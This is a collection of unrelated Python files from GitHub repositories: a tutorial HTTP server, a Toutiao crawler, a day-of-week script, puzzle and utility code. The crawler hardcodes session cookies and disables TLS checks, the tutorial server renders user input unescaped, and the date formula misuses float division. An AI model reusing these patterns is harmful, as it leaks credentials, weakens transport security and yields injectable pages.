app.register_vehicle(\"Volkswagen ID3\")\n","repo_name":"aviz92/PythonCourses","sub_path":"PythonCourses/BetterPython/N1_coupling_and_cohesion/coupling-cohesion-after.py","file_name":"coupling-cohesion-after.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11204303020","text":"import socket\n\n\nclass NoHandlerError(Exception):\n pass\n\n\nclass Request:\n pass\n\n\nclass Handler:\n def can_handle(self, request):\n return False\n\n def handle(self, request):\n raise RuntimeError(\"abstract\")\n\n\nclass Server:\n def __init__(self, host='127.0.0.1', port=80):\n self.s = socket.socket()\n server_addr = host, port\n self.s.bind(server_addr)\n self.handlers = []\n\n def add_handler(self, handler):\n self.handlers.append(handler)\n\n def get(self, path):\n def decorator(f):\n class DynamicHandler(Handler):\n def can_handle(self, request):\n return request.method == 'GET' and request.path == path\n def handle(self, request):\n return f(request)\n self.handlers.append(DynamicHandler())\n return f\n return decorator\n\n def post(self, path):\n def decorator(f):\n class DynamicHandler(Handler):\n def can_handle(self, request):\n return request.method == 'POST' and request.path == path\n def handle(self, request):\n return f(request)\n self.handlers.append(DynamicHandler())\n return f\n return decorator\n\n def any(self):\n def decorator(f):\n class DynamicHandler(Handler):\n def can_handle(self, request):\n return True\n def handle(self, request):\n return f(request)\n self.handlers.append(DynamicHandler())\n return f\n return decorator\n\n def serve_forever(self):\n self.s.listen()\n while True:\n s2, client_addr = self.s.accept()\n try:\n self.handle_client(s2)\n except:\n try:\n s2.send(b'HTTP/1.0 500 Internal Server Error\\r\\n\\r\\n')\n except:\n pass # the socket has died, do nothing\n finally:\n s2.close()\n\n def handle_client(self, socket):\n client_handler = ClientHandler(socket, self.handlers)\n request = client_handler.parse_request()\n response = client_handler.handle_request(request)\n client_handler.send_response(response)\n\n\nclass ClientHandler:\n def __init__(self, socket, handlers):\n self.socket = socket\n self.handlers = handlers\n\n def parse_request(self):\n raw_request = self.socket.recv(2048).decode().splitlines()\n request = Request()\n first_line = raw_request.pop(0)\n # METHOD /path HTTP/version\n request.method, request.path, request.http_version = first_line.split()\n request.http_version = request.http_version[len('HTTP/'):]\n\n request.headers = self.parse_headers(raw_request)\n request.body = '\\n'.join(raw_request)\n\n return request\n\n def parse_headers(self, raw_request):\n headers = dict()\n while True:\n line = raw_request.pop(0)\n if not line:\n # reached the end of headers\n break\n name, colon, value = line.partition(': ')\n headers[name] = value\n return headers\n\n def handle_request(self, request):\n for handler in self.handlers:\n if handler.can_handle(request):\n return handler.handle(request)\n raise NoHandlerError()\n\n def send_response(self, response):\n if isinstance(response, str):\n code = 200\n body = response\n else:\n code, body = response\n body = body.encode()\n\n code_name = {\n 200: 'OK',\n 201: 'Created',\n 404: 'Not Found'\n }[code]\n\n self.socket.send('HTTP/1.0 {} {}\\r\\n'.format(code, code_name).encode())\n\n self.send_header('Server', 'Simple HTTP server 0.1')\n self.send_header('Content-Type', 'text/html')\n self.send_header('Content-Length', len(body))\n\n self.finish_headers()\n self.socket.send(body)\n\n def send_header(self, name, value):\n self.socket.send('{}: {}\\r\\n'.format(name, value).encode())\n\n def finish_headers(self):\n self.socket.send(b'\\r\\n')\n\n\nclass ToDo:\n def __init__(self):\n self.list = []\n\n def render_html(self):\n res = '
    '\n for item in self.list:\n res += '
  • ' + item + '
  • '\n res += '
'\n return res\n\n def add(self, item):\n self.list.append(item)\n\n\nserver = Server(port=8000)\ntodo_list = ToDo()\n\n\n@server.get('/')\ndef root(request):\n return '''\n \n \n To-do list\n \n \n

Your to-do list:

\n {}\n
\n

Add a new item:

\n \n \n
\n \n '''.format(todo_list.render_html())\n\n\n@server.post('/new')\ndef new(request):\n new_todo = request.body.strip()\n new_todo = new_todo[len(\"name=\"):].replace('+', ' ')\n todo_list.add(new_todo)\n return 201, 'Created! Go back to the frontpage.'\n\n\n@server.any()\ndef not_found(request):\n return 404, 'Not Found'\n\n\nserver.serve_forever()\n","repo_name":"bugaevc/simple-http-server-tutorial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29627464876","text":"import requests\nimport random\n\n\n# 头条\nclass TouTiAo:\n\n headers = {\n 'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 5.1.1; YAL-AL00 Build/LYZ28N) NewsArticle/7.1.2 okhttp/3.10.0.2',\n 'Cookie': 'install_id=8432019592920; ttreq=1$0c5b0f1439b782077c3ec74acff14f55b057c014; odin_tt=6f79593b5ec6f'\n '247e7cf688c767fb74bb6758092f017884bb0d3fb06e0b6b152e621ba932dc0ef7e6215b558d3b492a138c3badb6ef7fb40'\n '1529ecac3e747036; history=alrvlFic6pJZXJCTWBmSmZt6KW7ziqlLPUtSc4vvMYhcjtuo9m4%2BAxPLJTFTBofLcZu2v%'\n '2BhpYOK4JJoB4q1tmsF%2BgInjEqsbiLe5qEwAJMfAAOZpLlcHyfEJMARcjttUdkemgYn3EnMLWC7Lcp0DE8sl%2Fksgufm%2F'\n 'nr5zYGK%2BxNXD4HCZgfW1ZiHXEo5LHKdYDoB46tVWNXyXGA%2BxHLgct3n%2FcRMHJr5L4oxgM6doKoDMFGYGu2zuYb0DTOyXR'\n 'OaAbSj0283AxH5J%2FBxI5ebmxGUMTByX2DlAcuvy3uxkYOK7JJgF1ify4C7ILTx%2BYH3FXw%2BCXC18Hiz3gH0PyBSBeRD%2F'\n 'ifaB7BMyZ3AAAAAA%2F%2F8%3D; qh[360]=1',\n }\n\n def __init__(self, params, url):\n self.params = params\n self.url = url\n\n def author_item_requests(self):\n author_item = requests.get(url=self.url, headers=self.headers, params=self.params, verify=False)\n print(author_item.text)\n\n\nif __name__ == '__main__':\n param = {\n 'category': 'profile_all',\n 'visited_uid': '50502346173',\n 'stream_api_version': '88',\n 'count': '20',\n 'offset': '0',\n 'device_id': '3069472387378669',\n 'channel': 'baidu',\n 'aid': '13',\n 'app_name': 'news_article',\n 'version_code': '712',\n 'device_platform': 'android',\n 'device_type': 'YAL-AL00',\n 'os_version': '5.1.1',\n }\n # 个人主页介绍\n # urls = 'https://lf.snssdk.com/user/profile/homepage/v7/?user_id=50025817786&refer=all'\n # 文章列表页 今日头条极速版\n # urls = 'https://is.snssdk.com/pgc/ma_mobile/?page_type=1&max_behot_time=1588833675000&\n # aid=35&media_id=50044041847&count=10&version=2&as=A1E5FE3BA3EBC83&cp=5EB39BDC18633E1×tamp=1476282741654'\n # 文章列表页 今日头条\n urls = 'https://is-hl.snssdk.com/api/feed/profile/v1/?'\n\n tou_ti_ao = TouTiAo(param, urls)\n tou_ti_ao.author_item_requests()\n\n\n","repo_name":"Supper0512/tools","sub_path":"crawler/toutiao/toutiao.py","file_name":"toutiao.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71836946705","text":"#QUESTION\n#Compse a program that accepts a date as imput and writes the day of the week that date falls on\n\n#your prgram should accept 3 command lines arguments - m(month),d(day),y(year)\n\nM=input(\"Enter month: \" )\nd=int(input(\"Enter the date: \"))\ny=int(input(\"Enter the year: \"))\n\nmonths= ['January', 'February', 'March', 'April', 'May', 'June', 'July','August', 'September', 'October', 'November', 'December']\ndays=['Sunday','Monday','Tuesday','Wednesday',\"Thursday\",'Friday','Saturday']\nm=months.index(M)+1\n\n#Formula for the Gregorian Calendar\ny1=y-(14-m)/12\nx=y1+y1/4 -y1/100 +y1/400\nm1=m+12*((14-m)/12)-2\nd1=(d+x+(31*m1)/12)%7\n\nprint(f\"On {M} {d} of year {y} : the day was {days[int(d1)]}\")\n\n\n\n\n","repo_name":"Abhisheksingh734/HackerRankPractice","sub_path":"Creative/dayOfTheweek.py","file_name":"dayOfTheweek.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40618377087","text":"# # Advent of Code - Day 17 - Part One\n\nboard = {}\n\n\nclass Block:\n def __init__(self, x, y, parent):\n self.x = x\n self.y = y\n self.parent = parent\n\n def can_move_left(self):\n global board\n return self.x > 0 and ((self.x - 1, self.y) not in board or board[(self.x - 1, self.y)] == self.parent)\n\n def can_move_right(self):\n return self.x < 6 and ((self.x + 1, self.y) not in board or board[(self.x + 1, self.y)] == self.parent)\n\n def can_move_down(self):\n return self.y > 0 and ((self.x, self.y - 1) not in board or board[(self.x, self.y - 1)] == self.parent)\n\n def move(self, delta_x, delta_y):\n self.x += delta_x\n self.y += delta_y\n\n def move_left(self):\n self.move(-1, 0)\n\n def move_right(self):\n self.move(1, 0)\n\n def move_down(self):\n self.move(0, -1)\n\n\nclass Shape:\n\n def __init__(self, row):\n col = 2\n self.blocks = [Block(col + part[0], row + part[1], self) for part in self.parts]\n self.add_blocks()\n self.shift = {'<': self.move_left, '>': self.move_right}\n\n def can_move_left(self):\n return all([block.can_move_left() for block in self.blocks])\n\n def can_move_right(self):\n return all([block.can_move_right() for block in self.blocks])\n\n def can_move_down(self):\n return all([block.can_move_down() for block in self.blocks])\n\n\n def add_blocks(self):\n for block in self.blocks:\n board[(block.x, block.y)] = self\n\n def clear_blocks(self):\n for block in self.blocks:\n del board[(block.x, block.y)]\n\n def move_left(self):\n if self.can_move_left():\n self.clear_blocks()\n for block in self.blocks:\n block.move_left()\n self.add_blocks()\n\n def move_right(self):\n if self.can_move_right():\n self.clear_blocks()\n for block in self.blocks:\n block.move_right()\n self.add_blocks()\n\n def move_down(self):\n if self.can_move_down():\n self.clear_blocks()\n for block in self.blocks:\n block.move_down()\n self.add_blocks()\n return False, max([block.y for block in self.blocks])\n else:\n return True, max([block.y for block in self.blocks])\n\n def get_height(self):\n return max([block.y for block in self.blocks])\n\n\nclass Minus(Shape):\n def __init__(self, row):\n self.parts = [[0, 0], [1, 0], [2, 0], [3, 0]]\n super().__init__(row)\n\n\nclass Plus(Shape):\n def __init__(self, row):\n self.parts = [[1, 0], [0, 1], [1, 1], [2, 1], [1, 2]]\n super().__init__(row)\n\n\nclass Seven(Shape):\n def __init__(self, row):\n self.parts = [[2, 2], [2, 1], [0, 0], [1, 0], [2, 0]]\n super().__init__(row)\n\n\nclass Ell(Shape):\n def __init__(self, row):\n self.parts = [[0, 0], [0, 1], [0, 2], [0, 3]]\n super().__init__(row)\n\n\nclass Square(Shape):\n def __init__(self, row):\n self.parts = [[0, 0], [0, 1], [1, 0], [1, 1]]\n super().__init__(row)\n\n\ndef result(jets):\n shapes = [Minus, Plus, Seven, Ell, Square]\n cycle = 0\n height = -1\n jet = 0\n prev_height = 0\n\n period = len(jets[0]) * len(shapes)\n number_of_periods = 1000000000000 // period\n remaining_iterations = 1000000000000 % period\n\n i = 0\n done = False\n heights = []\n p = 0\n repeating = False\n\n while not done:\n i += 1\n # Add shape\n current_shape = shapes[cycle](height + 4)\n cycle = (cycle + 1) % len(shapes)\n\n # Shift\n settled = False\n while not settled:\n current_shape.shift[jets[0][jet]]()\n jet = (jet + 1) % len(jets[0])\n settled, top = current_shape.move_down()\n\n height = max(top, height)\n\n if not repeating and (i - 5) % period == 0:\n heights.append(height)\n p += 1\n if p == 2:\n pattern = copy_board(height, 10)\n print_board(height, height - 10)\n elif p > 2:\n matching_pattern = copy_board(height, 10)\n if all([pattern[row] == matching_pattern[row] for row in range(10)]):\n print(p)\n print_board(height, height - 10)\n\n period_length = p - 2\n repeating = True\n r = 0\n\n if repeating:\n print(remaining_iterations - r)\n if r == remaining_iterations:\n result = heights[0] + number_of_periods * period_length * (heights[2] - heights[1]) + height - heights[2] + 1\n print(r, result)\n done = True\n r += 1\n\n return result\n\n\ndef print_board(height, rows=-1):\n for row in range(height, rows, -1):\n print(row, \": |\", end='')\n for col in range(7):\n print(\"#\" if (col, row) in board else \" \", end='')\n print(\"|\")\n print()\n\ndef copy_board(height, rows=-1):\n result = ['' for _ in range(rows)]\n for row in range(0, rows):\n result[row] = ''\n for col in range(7):\n result[row] += \"#\" if (col, height-row) in board else \" \"\n return result\n# rocks = [\n# [\n# ' @@@@ ',\n# ' ',\n# ' ',\n# ' '\n# ],\n# [\n# ' @ ',\n# ' @@@ ',\n# ' @ ',\n# ' ',\n# ' ',\n# ' '\n# ],\n# [\n# ' @ ',\n# ' @ ',\n# ' @@@ ',\n# ' ',\n# ' ',\n# ' '\n# ],\n# [\n# ' @ ',\n# ' @ ',\n# ' @ ',\n# ' @ ',\n# ' ',\n# ' ',\n# ' '\n# ],\n# [\n# ' @@ ',\n# ' @@ ',\n# ' ',\n# ' ',\n# ' '\n# ]\n# ]\n#\n#\n# def result(jets):\n# rock = 0\n# old_cave = ['1','2']\n# cave = ['#######']\n# jet = 0\n#\n# print(0)\n#\n# for i in range(2022):\n# # new rock\n#\n# cave[:0] = rocks[rock]\n# rock = (rock + 1) % len(rocks)\n# # [print(layer) for layer in cave]\n# # print(\"----\\n\")\n# print('\\r',i, len(cave), len(old_cave))\n# # input()\n#\n# dropped = True\n# while dropped:\n# if i == 9:\n# print(jet, jets[0][jet])\n# push(cave, jets[0][jet])\n# jet = (jet + 1) % len(jets[0])\n#\n# dropped = drop(cave)\n#\n# if i == 9:\n# [print(layer) for layer in cave]\n# print(\"\\n\")\n#\n# if old_cave and len(old_cave) > len(cave):\n# [print(layer) for layer in old_cave]\n# print(\"\\n\")\n# [print(layer) for layer in cave]\n# print(\"\\n\")\n# quit()\n# old_cave = cave.copy()\n#\n# return len(cave)-1\n#\n#\n# def push(cave, jet):\n# if jet == '<':\n# push = -1\n# check_range = range(1,7)\n# else:\n# push = 1\n# check_range = range(0,6)\n#\n# bottom_row = 0\n# while '@' not in cave[bottom_row]:\n# bottom_row += 1\n#\n# while '@' in cave[bottom_row]:\n# bottom_row += 1\n#\n# stuck = any([(cave[row][0] == '@' and push == -1) or\n# (cave[row][6] == '@' and push == 1) or\n# (cave[row][col] == '@' and cave[row][col+push] == '#')\n# for col in check_range for row in range(0, bottom_row)])\n#\n# if not stuck:\n# for row in range(0, bottom_row):\n# new_row = ''\n# for col in range(0, 7):\n# if 0 <= col - push < 7 and cave[row][col - push] == '@':\n# new_row += '@'\n# elif cave[row][col] == '@':\n# new_row += ' '\n# else:\n# new_row += cave[row][col]\n# cave[row] = new_row\n#\n#\n# def drop(cave):\n# top_row = 0\n# while '#' not in cave[top_row]:\n# top_row += 1\n#\n# bottom_row = 0\n# while '@' not in cave[bottom_row]:\n# bottom_row += 1\n#\n# while '@' in cave[bottom_row]:\n# bottom_row += 1\n#\n# if bottom_row < top_row:\n# del cave[bottom_row]\n# return True\n#\n# if all([\n# cave[row][col] in (' ','@') or cave[row-1][col] in (' ','#')\n# for row in range(top_row, bottom_row + 1)\n# for col in range(7)\n# ]):\n# for row in range(bottom_row, 0, -1):\n# new_row = ''\n# for col in range(7):\n# new_row += cave[row-1][col] if cave[row][col] == ' ' else cave[row][col]\n# cave[row] = new_row\n# cave[row-1] = cave[row-1].replace('@', ' ')\n# if '#' not in cave[0]:\n# del cave[0]\n# else:\n# for row in range(0, bottom_row):\n# cave[row] = cave[row].replace('@', '#')\n# return False\n# return True\n#\n","repo_name":"scerruti/AoC2022-python","sub_path":"aoc/day17/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":9009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36695367100","text":"from pickle import TRUE\nfrom flask import Flask, render_template, request\n\nimport utils\n\n#app = Flask(__name__)\napp = Flask(__name__, static_url_path='/static')\n#app._static_folder = \"./FYP-22-S4-15/app/static\"\n\n@app.route('/')\n#@app.route('/codeEditor')\ndef codeEditor():\n return render_template('codeEditor.html')\n\n\n@app.route('/get_stack_overflow_query_search_results', methods=['POST'])\ndef get_stack_overflow_query_search_results():\n searchText = request.form.get('searchText')\n\n results = utils.getStackOverflowQuerySearchResults(searchText)\n return results\n\n\nif __name__ == '__main__':\n app.run(debug=TRUE)\n","repo_name":"pythonopolis/pythonopolis.github.io","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26211374552","text":"\"\"\"Configure behaviour of program on system start.\"\"\"\nimport pathlib\n\nfrom library import constants\nfrom library.helpers import windows_shortcuts\n\n_STARTUP_PATH = pathlib.WindowsPath(constants.STARTUP_PATH)\n_EXECUTABLE_PATH = pathlib.WindowsPath(constants.EXECUTABLE_PATH)\n\n\ndef add():\n \"\"\"Add the program to windows startup.\"\"\"\n windows_shortcuts.create_shortcut(_STARTUP_PATH.joinpath(constants.PROGRAM_NAME + \".lnk\"),\n _EXECUTABLE_PATH,\n arguments=\"-b\")\n\n\ndef remove():\n \"\"\"Remove the program from windows startup.\"\"\"\n _STARTUP_PATH.joinpath(constants.PROGRAM_NAME + \".lnk\").unlink()\n\n\ndef is_added() -> bool:\n \"\"\"Return whether program is added to windows startup.\"\"\"\n for item in _STARTUP_PATH.iterdir():\n if windows_shortcuts.is_shortcut(item) and windows_shortcuts.read_shortcut(\n item).name == constants.PROGRAM_NAME + \".exe\":\n return True\n return False\n","repo_name":"jarikmarwede/Start-Menu-Helper","sub_path":"library/helpers/windows_startup.py","file_name":"windows_startup.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"13862138685","text":"import math\nfrom concurrent.futures import ThreadPoolExecutor\nimport random\nimport subprocess\nimport collections\n\nimport tornado.gen\n\nimport exceptions.exceptions as ex\nfrom utils import logger\nfrom services.application import Application\n\n\ndef run_job(pid, job, out=logger.warn):\n logger.log(\"Starting Simulation Thread.\")\n logger.log(job[\"command\"])\n process = subprocess.Popen(job[\"command\"], stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n for line in iter(process.stdout.readline, ''):\n if job[\"kill\"] is True:\n process.kill()\n raise ex.CancelledSimulationException\n message = {\n \"job_id\": pid,\n \"message\": '{}'.format(line.rstrip())\n }\n logger.debug(message)\n out(message, \"output\")\n process.wait()\n return process.returncode\n\n\nclass ProcessManager:\n\n def __init__(self):\n self.jobs = {\n 'queued': collections.deque(),\n 'running': [],\n }\n self.app = Application()\n self.executor = ThreadPoolExecutor(max_workers=20)\n\n def generate_random_pid(self):\n while True:\n pid = math.floor(random.randrange(100000, 999999))\n if not (any(proc == pid for proc in self.jobs[\"queued\"]) and\n any(proc == pid for proc in self.jobs[\"running\"])):\n return pid\n\n async def run_job(self, command, pid=None, out=logger.warn):\n\n pid = pid if pid else self.generate_random_pid()\n\n await self.wait_for_queue(pid, out)\n\n job = {\"pid\": pid, \"executor\": None, \"command\": command, \"kill\": False}\n self.jobs[\"running\"].append(job)\n out({\"job_id\": pid, \"status\": \"Running\"}, \"status\")\n logger.log(\"Starting Job #{}\".format(pid))\n proc = self.executor.submit(run_job, pid, job, out)\n job[\"executor\"] = proc\n\n while proc.running():\n await tornado.gen.sleep(1)\n\n exit_code = proc.result()\n\n self.jobs[\"running\"].remove(job)\n\n if exit_code is 0:\n out({\"job_id\": pid, \"status\": \"Completed\"}, \"status\")\n logger.log(\"Finished Job #{}\".format(pid))\n return pid\n else:\n out({\"job_id\": pid, \"status\": \"Failed\"}, \"status\")\n out(\"Job #{} Failed\".format(pid), \"error\")\n logger.log(\"Job #{} Failed\".format(pid))\n raise ex.ProcessFailureException\n\n async def wait_for_queue(self, pid, out=logger.warn):\n\n if len(self.jobs[\"running\"]) >= self.app.config.MAX_SIM_THREADS:\n self.jobs[\"queued\"].append(pid)\n logger.log(self.jobs)\n out({\"job_id\": pid, \"status\": \"Queued\",\n \"position\": len(self.jobs[\"queued\"])}, \"status\")\n while self.jobs[\"queued\"][0] is not pid or len(\n self.jobs[\"running\"]) >= self.app.config.MAX_SIM_THREADS:\n await tornado.gen.sleep(\n self.app.config.DEFAULT_QUEUE_CHECK_INTERVAL)\n return self.jobs[\"queued\"].popleft()\n\n def cancel_job(self, pid):\n if pid in self.jobs[\"queued\"]:\n self.jobs[\"queued\"].remove(pid)\n else:\n job = next((job for job in self.jobs[\"running\"]\n if job[\"pid\"] == pid), None)\n if job:\n logger.log(self.jobs[\"running\"])\n job[\"kill\"] = True\n logger.log(job[\"executor\"].cancelled())\n self.jobs[\"running\"].remove(job)\n","repo_name":"cmatheny/simc-api","sub_path":"python/services/process_manager.py","file_name":"process_manager.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23470649363","text":"from collections import namedtuple\r\nfrom typing import Any, Iterable, Tuple, Union\r\n\r\nfrom attrs import define, field, frozen\r\nfrom attrs.validators import instance_of\r\nfrom loguru import logger\r\nimport mercantile\r\nimport math\r\n\r\n# This is intended as a convenient shorthand for now, but it should be better handled.\r\nvalid_float_int_to_float = field(converter=float, validator=instance_of((float, int)))\r\n\r\n_LatLonExtents = namedtuple(\"LatLonExtents\", (\"lat, lon, rv\"))\r\n_xyExtents = namedtuple(\"xyExtents\", (\"x, y, rv\"))\r\n# Extents definitions. At some point, if there are more projections needed, well, pyproj4...\r\nLatLonExtents = _LatLonExtents(85.051129, 180, 8)\r\nxyExtents = _xyExtents(20037508.342789244, 20037508.342789244, 8)\r\n\r\n\r\ndef clamp(a: Union[float, int], v: Union[float, int]) -> Union[float, int]:\r\n \"\"\"Clamps a to [-v, +v]\"\"\"\r\n assert v >= 0, f\"Clamp value must be positive, not {v}.\"\r\n return min(max(a, -v), v)\r\n\r\n\r\ndef lat_converter(lat: Union[int, float]) -> float:\r\n \"\"\"Convenience function for clamp_float_round fot lat\"\"\"\r\n lle = LatLonExtents\r\n return clamp_float_round(lat, lle.lat, lle.rv)\r\n\r\n\r\ndef lon_converter(lon: Union[int, float]) -> float:\r\n \"\"\"Convenience function for clamp_float_round fot lon\"\"\"\r\n lle = LatLonExtents\r\n return clamp_float_round(lon, lle.lon, lle.rv)\r\n\r\n\r\ndef x_xy_converter(x_xy: Union[int, float]) -> float:\r\n \"\"\"Convenience function for clamp_float_round fot x\"\"\"\r\n xye = xyExtents\r\n return clamp_float_round(x_xy, xye.x, xye.rv)\r\n\r\n\r\ndef y_xy_converter(y_xy: Union[int, float]) -> float:\r\n \"\"\"Convenience function for clamp_float_round fot y\"\"\"\r\n xye = xyExtents\r\n return clamp_float_round(y_xy, xye.y, xye.rv)\r\n\r\n\r\ndef clamp_float_round(\r\n v: Union[int, float], ex: Union[int, float], rv: int\r\n) -> Union[float, Any]:\r\n \"\"\"\r\n Clamps the value v to the extent given as ex, and rounds to rv.\r\n Args:\r\n v (Union[int, float]): Value to clamp.\r\n ex (Union[int, float]): EXtent to clamp the value to, inclusive.\r\n rv (Union[int, float]): Roundint places Value.\r\n Returns:\r\n Union[float, Any]: either the rounded, clamped float, or a passthrough to the underlying validator.\r\n \"\"\"\r\n try:\r\n cc = clamp(v, ex)\r\n r = float(round(cc, rv))\r\n return r\r\n except Exception:\r\n return v\r\n\r\n\r\nlat_field = field(converter=lat_converter, validator=instance_of(float))\r\nlon_field = field(converter=lon_converter, validator=instance_of(float))\r\n\r\nx_field = field(converter=x_xy_converter, validator=instance_of(float))\r\ny_field = field(converter=y_xy_converter, validator=instance_of(float))\r\n\r\n\r\n@frozen(slots=True, weakref_slot=False)\r\nclass BasePoint:\r\n \"\"\"\r\n Baseclass with no attributes. Probably don't use this.\r\n \"\"\"\r\n\r\n def __iter__(self) -> Iterable[Tuple[float, float]]:\r\n \"\"\"\r\n __slots__ contains all the attributes of the class. We only want to iterate over the data containing attrs.\r\n For the child classes, this means removing the crs. For this class, the __weakref__.\r\n __match_args__ would work better, but it's Python >=3.10 feature with the latest attrs.\r\n \"\"\"\r\n x = [\r\n getattr(self, s)\r\n for s in list(self.__slots__)\r\n if s not in [\"crs\", \"__weakref__\"]\r\n ]\r\n return iter(x)\r\n\r\n def __len__(self) -> int:\r\n return len([x for x in self.__slots__ if x not in [\"crs\", \"__weakref__\"]])\r\n\r\n def __getitem__(self, idx: int) -> Union[float, float]:\r\n try:\r\n return tuple(self)[idx]\r\n except Exception as e:\r\n msg = e.__str__().replace(\"tuple\", type(self).__name__)\r\n raise e.__class__(msg)\r\n\r\n\r\n@frozen(slots=True)\r\nclass Point(BasePoint):\r\n \"\"\"x, y point.\"\"\"\r\n\r\n x: float = valid_float_int_to_float\r\n y: float = valid_float_int_to_float\r\n\r\n\r\n# Alias for point.\r\nPixel = Point\r\n\r\n\r\n@frozen(slots=True)\r\nclass xyPoint(BasePoint):\r\n \"\"\"X, Y point with a CRS and bounds clamping.\"\"\"\r\n\r\n x: float = x_field\r\n y: float = y_field\r\n crs: str = field(default=\"EPSG:3857\", init=False)\r\n\r\n\r\n@frozen(slots=True)\r\nclass LatLon(BasePoint):\r\n \"\"\"lat, lon point with a CRS and bounds clamping.\"\"\"\r\n\r\n lat: float = lat_field\r\n lon: float = lon_field\r\n crs: str = field(default=\"EPSG:4326\", init=False)\r\n\r\n\r\n@define\r\nclass BBoxBase:\r\n \"\"\"\r\n Base class for the bounding box. This could be used directly as a generic bounding box, if needed.\r\n Note that the coordinates are given in x/y form, which is lon/lat form, *not* lat/lon form.\r\n \"\"\"\r\n\r\n left: float = valid_float_int_to_float\r\n top: float = valid_float_int_to_float\r\n right: float = valid_float_int_to_float\r\n bottom: float = valid_float_int_to_float\r\n crs: str = field(default=\"\", validator=instance_of(str))\r\n point_type: namedtuple = field(default=Point, init=False, repr=False)\r\n\r\n @property\r\n def tl(self) -> Point:\r\n \"\"\"Top Left corner point\"\"\"\r\n return self.point_type(self.left, self.top)\r\n\r\n @property\r\n def br(self) -> Point:\r\n \"\"\"Bottom Right corner point\"\"\"\r\n return self.point_type(self.right, self.bottom)\r\n\r\n @property\r\n def x_dim(self) -> Union[float, int]:\r\n \"\"\"x (left-right) dimension\"\"\"\r\n return max(self.left, self.right) - min(self.left, self.right)\r\n\r\n @property\r\n def y_dim(self) -> Union[float, int]:\r\n \"\"\"y (top-bottom) dimension\"\"\"\r\n return max(self.top, self.bottom) - min(self.top, self.bottom)\r\n\r\n @property\r\n def xy_dims(self) -> Tuple[Union[float, int], Union[float, int]]:\r\n \"\"\"x and y dimensions\"\"\"\r\n return self.x_dim, self.y_dim\r\n\r\n @property\r\n def area(self) -> int:\r\n \"\"\"Naive are calculation. crs setting would affect this.\"\"\"\r\n return self.x_dim * self.y_dim\r\n\r\n @property\r\n def center(self) -> Point:\r\n \"\"\"Center of this bbox.\"\"\"\r\n c_x = self.left + (self.right - self.left) / 2\r\n c_y = self.top + (self.bottom - self.top) / 2\r\n return self.point_type(c_x, c_y)\r\n\r\n def __iter__(self) -> Iterable[Tuple[int, int, int, int]]:\r\n return iter((self.left, self.top, self.right, self.bottom))\r\n\r\n def __eq__(self, cmp: Any) -> bool:\r\n is_inst = isinstance(cmp, type(self))\r\n if isinstance(cmp, (tuple, list)) and len(cmp) == 4 or is_inst:\r\n a, b, c, d = cmp\r\n eq1 = (a, b, c, d) == (self.left, self.top, self.right, self.bottom)\r\n eq2 = self.crs == cmp.crs if is_inst else True\r\n eq3 = self.point_type == cmp.point_type if is_inst else True\r\n return eq1 and eq2 and eq3\r\n return False\r\n\r\n def __ne__(self, cmp: Any) -> bool:\r\n return not self.__eq__(cmp)\r\n\r\n def __contains__(self, pnt: Any) -> bool:\r\n if not isinstance(pnt, self.point_type):\r\n return False\r\n pa, pb = pnt\r\n l, t, r, b = tuple(self)\r\n return l < pa < r and b < pb < t\r\n\r\n def __getitem__(self, idx: int) -> Union[float, float]:\r\n try:\r\n return tuple(self)[idx]\r\n except Exception as e:\r\n msg = e.__str__().replace(\"tuple\", type(self).__name__)\r\n raise e.__class__(msg)\r\n\r\n class BoundsError(Exception):\r\n def __init__(self, message) -> None:\r\n self.message = message\r\n super().__init__(self.message)\r\n\r\n\r\n@define\r\nclass BBox(BBoxBase):\r\n _aliases: dict = field(init=False, default=None, repr=False)\r\n # crs: str = field(default=\"\", validator=instance_of(str)) # ToDo: CRS should be here, not the base class.\r\n \"\"\"\r\n This is a bit weird looking, but the goal is to be able to just drop arbitrary bad input on a BBox, and have it (try to) make something reasonable out of it.\r\n This means a mix of mandatory args and kwargs, and an optional kwarg.\r\n ToDo: would be really nice to have the same conversion and validation on this as on the point classes.\r\n \"\"\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n bbox_aliases = {\r\n (\"_lln\", \"maxy\", \"ymax\", \"north\", \"n\", \"t\", \"up\", \"u\"): \"top\",\r\n (\"_lls\", \"miny\", \"ymin\", \"south\", \"s\", \"b\", \"down\", \"d\"): \"bottom\",\r\n (\"_llw\", \"minx\", \"xmin\", \"west\", \"w\", \"l\"): \"left\",\r\n (\"_lle\", \"maxx\", \"xmax\", \"east\", \"e\", \"r\"): \"right\",\r\n (\"_llc\", \"srs\"): \"crs\",\r\n }\r\n setattr(self, \"_aliases\", bbox_aliases)\r\n # This works for ASCII only, probably.\r\n kwargs = {k.lower(): v for k, v in kwargs.items()}\r\n # Map our kwargs keys to the appropriate argument using the aliases.\r\n a = {self.lookup(kw): v for kw, v in kwargs.items()}\r\n # Handle args by turning them into kwargs This currently assumes that no args and kwargs overlap.\r\n b = {k: v for k, v in zip((\"left\", \"top\", \"right\", \"bottom\", \"crs\"), args)}\r\n a.update(b)\r\n\r\n self.__attrs_init__(**a)\r\n\r\n # def __attrs_post_init__(self, *args, **kwargs):\r\n # \"\"\"\r\n # This probably makes more sense as a validator.\r\n # But idea is to validate that the bbox is valid.\r\n # Rules aren't correct 